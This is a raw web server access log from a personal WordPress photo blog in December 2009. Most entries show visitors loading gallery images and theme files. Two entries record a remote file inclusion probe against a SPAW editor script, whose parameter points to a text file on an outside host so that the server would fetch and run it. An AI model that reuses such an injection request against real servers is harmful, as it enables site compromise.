24.22.69.180 - - [14/Dec/2009:10:01:44 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1" 200 3864 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:44 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1-20090123 HTTP/1.1" 200 12100 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:44 -0800] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.1" 200 6637 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture279-1024.jpg HTTP/1.1" 200 53903 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture022-1024.jpg HTTP/1.1" 200 56436 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture011-1024.jpg HTTP/1.1" 200 66511 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture020-1024.jpg HTTP/1.1" 200 95191 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture007-1024.jpg HTTP/1.1" 200 74041 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture010-1024.jpg HTTP/1.1" 200 71517 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture037-1024.jpg HTTP/1.1" 200 84214 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/uploads/imagerotator.swf HTTP/1.1" 200 42753 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture032-1024.jpg HTTP/1.1" 200 101230 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture036-1024.jpg HTTP/1.1" 200 93501 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture038-1024.jpg HTTP/1.1" 200 81949 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture039-1024.jpg HTTP/1.1" 200 94005 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:45 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture040-1024.jpg HTTP/1.1" 200 96476 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture041-1024.jpg HTTP/1.1" 200 83786 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture042-1024.jpg HTTP/1.1" 200 75627 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickbgwide.jpg HTTP/1.1" 200 885 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture043-1024.jpg HTTP/1.1" 200 79971 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickheader.jpg HTTP/1.1" 200 10076 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture044-1024.jpg HTTP/1.1" 200 78072 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture046-1024.jpg HTTP/1.1" 200 81406 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture056-1024.jpg HTTP/1.1" 200 76150 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture052-1024.jpg HTTP/1.1" 200 76308 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture059-1024.jpg HTTP/1.1" 200 92776 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/index.php?slideshow=true&gid=20&322 HTTP/1.1" 200 11455 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture060-1024.jpg HTTP/1.1" 200 78967 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture061-1024.jpg HTTP/1.1" 200 105839 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture062-1024.jpg HTTP/1.1" 200 81896 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture063-1024.jpg HTTP/1.1" 200 87113 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture064-1024.jpg HTTP/1.1" 200 90737 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:46 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture065-1024.jpg HTTP/1.1" 200 97893 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:47 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture002-1024.jpg HTTP/1.1" 200 85217 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:47 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture067-1024.jpg HTTP/1.1" 200 82518 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:47 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture068-1024.jpg HTTP/1.1" 200 65857 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:47 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture070-1024.jpg HTTP/1.1" 200 78258 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:47 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickfooter.jpg HTTP/1.1" 200 2683 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:47 -0800] "GET /blog/wp-includes/js/thickbox/loadingAnimation.gif HTTP/1.1" 200 5886 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:47 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "www.dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:00 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture045-1024.jpg HTTP/1.1" 200 76062 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
95.110.198.81 - - [14/Dec/2009:10:02:05 -0800] "GET /logs/access_071228.log%20%20/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:10:02:11 -0800] "GET /logs/access_080701.log%20%20/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:13 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture050-1024.jpg HTTP/1.1" 200 72603 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
64.157.4.43 - - [14/Dec/2009:10:02:23 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.1" 200 727834 "-" "-" "www.dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:26 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture023-1024.jpg HTTP/1.1" 200 59964 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:38 -0800] "GET /blog/index.php/page/2/ HTTP/1.1" 200 20197 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:38 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_003.jpg HTTP/1.1" 200 555088 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:38 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_001.jpg HTTP/1.1" 200 611206 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:38 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_002.jpg HTTP/1.1" 200 601843 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:38 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_005.jpg HTTP/1.1" 200 620247 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:38 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_042.jpg HTTP/1.1" 200 669364 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:39 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_008.jpg HTTP/1.1" 200 816060 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:40 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_007.jpg HTTP/1.1" 200 596976 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:40 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_012.jpg HTTP/1.1" 200 517793 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:40 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_013.jpg HTTP/1.1" 200 509456 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:40 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_014.jpg HTTP/1.1" 200 656470 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:40 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_015.jpg HTTP/1.1" 200 536939 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
64.157.4.42 - - [14/Dec/2009:10:02:40 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.1" 200 727834 "-" "-" "www.dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:41 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_016.jpg HTTP/1.1" 200 449792 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:41 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_021.jpg HTTP/1.1" 200 621789 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:41 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_020.jpg HTTP/1.1" 200 628243 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:41 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_023.jpg HTTP/1.1" 200 724029 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:41 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_030.jpg HTTP/1.1" 200 890330 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:41 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_046.jpg HTTP/1.1" 200 620341 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:42 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_040.jpg HTTP/1.1" 200 522506 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
